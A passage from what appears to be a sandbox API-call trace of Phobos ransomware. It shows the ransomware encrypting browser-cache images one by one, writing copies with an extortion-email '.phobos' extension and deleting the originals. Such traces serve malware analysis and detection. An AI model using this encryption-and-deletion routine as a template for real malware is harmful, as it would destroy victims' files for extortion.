CryptDestroyKey (hKey=0xa32d28) returned 1 [0179.195] CloseHandle (hObject=0x14c) returned 1 [0179.195] CloseHandle (hObject=0x178) returned 1 [0179.195] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdSLV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedslv[1].jpg")) returned 1 [0179.195] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0179.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe2Pd[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee2pd[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0179.197] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2175) returned 1 [0179.197] CloseHandle (hObject=0x178) returned 1 [0179.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe2Pd[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee2pd[1].jpg")) returned 0x2020 [0179.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe2Pd[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee2pd[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe2Pd[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee2pd[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0179.198] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.198] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe2Pd[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee2pd[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0179.198] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0179.198] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.198] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x87f, lpOverlapped=0x0) returned 1 [0179.201] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x880, dwBufLen=0x880 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x880) returned 1 [0179.201] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x880, lpOverlapped=0x0) returned 1 [0179.203] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0179.203] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.203] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0179.203] CryptDestroyKey (hKey=0xa32c28) returned 1 [0179.203] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0179.203] CryptDestroyKey (hKey=0xa32d28) returned 1 [0179.203] CloseHandle (hObject=0x178) returned 1 [0179.203] CloseHandle (hObject=0x14c) returned 1 [0179.203] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe2Pd[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee2pd[1].jpg")) returned 1 [0179.204] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0179.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe4Oo[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee4oo[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0179.205] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16303) returned 1 [0179.205] CloseHandle (hObject=0x14c) returned 1 [0179.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe4Oo[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee4oo[1].png")) returned 0x2020 [0179.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe4Oo[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee4oo[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe4Oo[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee4oo[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0179.206] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.206] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe4Oo[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee4oo[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0179.206] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0179.206] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.206] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3faf, lpOverlapped=0x0) returned 1 [0179.237] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3fb0, dwBufLen=0x3fb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3fb0) returned 1 [0179.237] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3fb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3fb0, lpOverlapped=0x0) returned 1 [0179.238] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0179.238] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.238] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0179.238] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0179.238] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0179.238] CryptDestroyKey (hKey=0xa32d28) returned 1 [0179.238] CloseHandle (hObject=0x14c) returned 1 [0179.238] CloseHandle (hObject=0x178) returned 1 [0179.238] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe4Oo[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee4oo[1].png")) returned 1 [0179.239] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0179.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeFp3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeefp3[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0179.240] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=7462) returned 1 [0179.240] CloseHandle (hObject=0x178) returned 1 [0179.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeFp3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeefp3[1].jpg")) returned 0x2020 [0179.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeFp3[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeefp3[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeFp3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeefp3[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0179.240] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.240] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeFp3[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeefp3[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0179.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0179.241] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.241] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1d26, lpOverlapped=0x0) returned 1 [0179.386] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1d30, dwBufLen=0x1d30 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1d30) returned 1 [0179.386] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1d30, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1d30, lpOverlapped=0x0) returned 1 [0179.388] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0179.388] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.388] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0179.388] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0179.388] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0179.388] CryptDestroyKey (hKey=0xa32d28) returned 1 [0179.388] CloseHandle (hObject=0x178) returned 1 [0179.388] CloseHandle (hObject=0x14c) returned 1 [0179.388] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeFp3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeefp3[1].jpg")) returned 1 [0179.389] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0179.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeUg0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeug0[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0179.390] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1982) returned 1 [0179.390] CloseHandle (hObject=0x14c) returned 1 [0179.390] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeUg0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeug0[1].jpg")) returned 0x2020 [0179.390] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeUg0[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeug0[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeUg0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeug0[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0179.390] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.390] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeUg0[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeug0[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0179.391] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0179.391] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.391] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7be, lpOverlapped=0x0) returned 1 [0179.444] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7c0, dwBufLen=0x7c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7c0) returned 1 [0179.444] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x7c0, lpOverlapped=0x0) returned 1 [0179.446] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0179.446] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0179.446] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0179.446] CryptDestroyKey (hKey=0xa32c68) returned 1 [0179.446] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0179.446] CryptDestroyKey (hKey=0xa32d28) returned 1 [0179.446] CloseHandle (hObject=0x14c) returned 1 [0179.446] CloseHandle (hObject=0x178) returned 1 [0179.446] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeUg0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeug0[1].jpg")) returned 1 [0179.447] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0179.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeZnr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeznr[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0179.448] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=14890) returned 1 [0179.448] CloseHandle (hObject=0x178) returned 1 [0179.448] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeZnr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeznr[1].jpg")) returned 0x2020 [0179.448] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeZnr[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeznr[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeZnr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeznr[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0179.448] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.448] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0179.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet 